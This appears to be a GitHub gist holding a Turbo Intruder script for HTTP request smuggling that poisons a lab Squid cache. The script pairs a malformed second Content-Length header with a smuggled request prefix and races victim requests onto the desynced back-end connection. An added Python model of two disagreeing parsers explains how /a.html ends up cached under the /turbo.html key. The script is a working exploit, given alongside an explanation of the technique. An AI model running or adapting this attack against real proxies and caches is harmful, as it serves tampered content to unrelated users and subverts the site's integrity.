@DanielIntruder
Created October 20, 2021 18:59
A Turbo Intruder script to poison a cache via CL.CL request smuggling: the attack request carries a well-formed Content-Length header plus a second, malformed one (Content-Length abcde: 0), and the two hops in front of the origin disagree about where the request body ends.
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
# (the request templates below are sent byte-for-byte; LF-only line endings break the HTTP framing)
# RequestEngine, Engine, table and time are provided by Turbo Intruder's script environment.
def queueRequests(target, wordlists):
    # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1, # if you increase this from 1, you may get false positives
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )

    # The attack to send. Two Content-Length headers: the well-formed one carries the
    # real body length, the malformed 'Content-Length abcde' one says 0. A hop that
    # tolerates the malformed name sees an empty body and treats the body bytes as
    # the start of the next request on the connection. The blank line that terminates
    # the headers is part of the template and must stay.
    attack = '''POST /b.shtml HTTP/1.1
Host: squid01.rslab
Connection: Keep-Alive
Content-Length: %d
Content-Length abcde: 0

'''

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    # Ending on an unfinished header means the victim's own request line becomes that
    # header's value, so the response to /a.html comes back for the victim's request.
    prefix = '''GET /a.html HTTP/1.1
Something: '''

    # The request engine will auto-fix the content-length for us
    attack += prefix
    attack = attack % len(prefix)
    engine.queue(attack)

    # Requests racing to be the next one on the desynced back-end connection;
    # whichever lands there gets the smuggled prefix attached to it.
    victim = '''GET /turbo.html HTTP/1.1
Host: squid01.rslab

'''
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)
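The desync the script relies on, modelled as an added example (this is not code from the gist, from Turbo Intruder or from Squid): two toy request parsers read the same connection bytes but disagree on the malformed Content-Length header. Which real hop tolerates the malformed name is not stated on the page; here a strict parser stands in for the front-end and a hypothetical lenient parser, which truncates header names at the first space and lets the last Content-Length win, stands in for the back-end. The attack and prefix templates are the script's own; the victim request is constructed inline as the next request on the same back-end connection.

```python
# Added example: toy model of the CL.CL desync behind the gist's script.
# Both parsers are hypothetical models, not the behaviour of any named server.
from typing import Callable, Dict, List, Tuple

CRLF = "\r\n"

# (method, path, headers, body)
Request = Tuple[str, str, Dict[str, str], str]

# Same templates the script sends; the victim request is constructed for this example.
PREFIX = "GET /a.html HTTP/1.1" + CRLF + "Something: "
VICTIM = "GET /turbo.html HTTP/1.1" + CRLF + "Host: squid01.rslab" + CRLF + CRLF


def strict_content_length(header_lines: List[str]) -> int:
    """Front-end model: only a header named exactly Content-Length counts,
    so the malformed 'Content-Length abcde' line is ignored."""
    for line in header_lines:
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-length":
            return int(value.strip())
    return 0


def lenient_content_length(header_lines: List[str]) -> int:
    """Back-end model (hypothetical): the header name is cut at its first
    whitespace, so 'Content-Length abcde' reads as Content-Length, and the
    last occurrence wins, i.e. the body is taken to be empty."""
    length = 0
    for line in header_lines:
        name, _, value = line.partition(":")
        tokens = name.split()
        if tokens and tokens[0].lower() == "content-length":
            length = int(value.strip())
    return length


def read_requests(stream: str, cl_of: Callable[[List[str]], int]) -> List[Request]:
    """Parse every request on a keep-alive connection under one Content-Length
    policy. Bytes left after a body are the start of the next request, which is
    exactly how the smuggled prefix gets attached to the victim's request."""
    parsed: List[Request] = []
    while stream:
        head, sep, rest = stream.partition(CRLF + CRLF)
        if not sep:
            break  # headers not terminated; a real server would keep reading
        lines = head.split(CRLF)
        method, path, _version = lines[0].split(" ", 2)
        headers: Dict[str, str] = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        n = cl_of(lines[1:])
        parsed.append((method, path, headers, rest[:n]))
        stream = rest[n:]
    return parsed


def build_stream(prefix: str, victim: str) -> str:
    """Bytes carried by the connection: the attack built the way the script
    builds it (template % len(prefix), prefix as body), then the victim."""
    attack = (
        "POST /b.shtml HTTP/1.1" + CRLF
        + "Host: squid01.rslab" + CRLF
        + "Connection: Keep-Alive" + CRLF
        + "Content-Length: %d" + CRLF
        + "Content-Length abcde: 0" + CRLF
        + CRLF
    )
    return attack % len(prefix) + prefix + victim


def desync_views(prefix: str = PREFIX, victim: str = VICTIM) -> Tuple[List[Request], List[Request]]:
    """The front-end forwards the bytes unchanged, so both hops see the same
    stream; only their idea of where each request ends differs."""
    stream = build_stream(prefix, victim)
    return read_requests(stream, strict_content_length), read_requests(stream, lenient_content_length)


def poisoned_entries(front: List[Request], back: List[Request]) -> List[Tuple[str, str]]:
    """Responses are paired by position on the shared connection: the cache keys
    the i-th response under the path it forwarded, but the back-end produced it
    for the path it parsed. Each mismatch is a (cache key, served path) pair."""
    return [(f[1], b[1]) for f, b in zip(front, back) if f[1] != b[1]]


if __name__ == "__main__":
    front, back = desync_views()
    print("front-end sees", [(m, p) for m, p, _, _ in front])
    print("back-end sees ", [(m, p) for m, p, _, _ in back])
    print("poisoned", poisoned_entries(front, back))
```

Under the strict policy the prefix is the POST body and the victim's GET /turbo.html follows intact; under the lenient policy the POST has no body, so the prefix plus the victim's bytes parse as GET /a.html with the victim's request line swallowed into the Something header. The cache then stores the /a.html response under the /turbo.html key, which is the poisoning the script's victim loop is racing for.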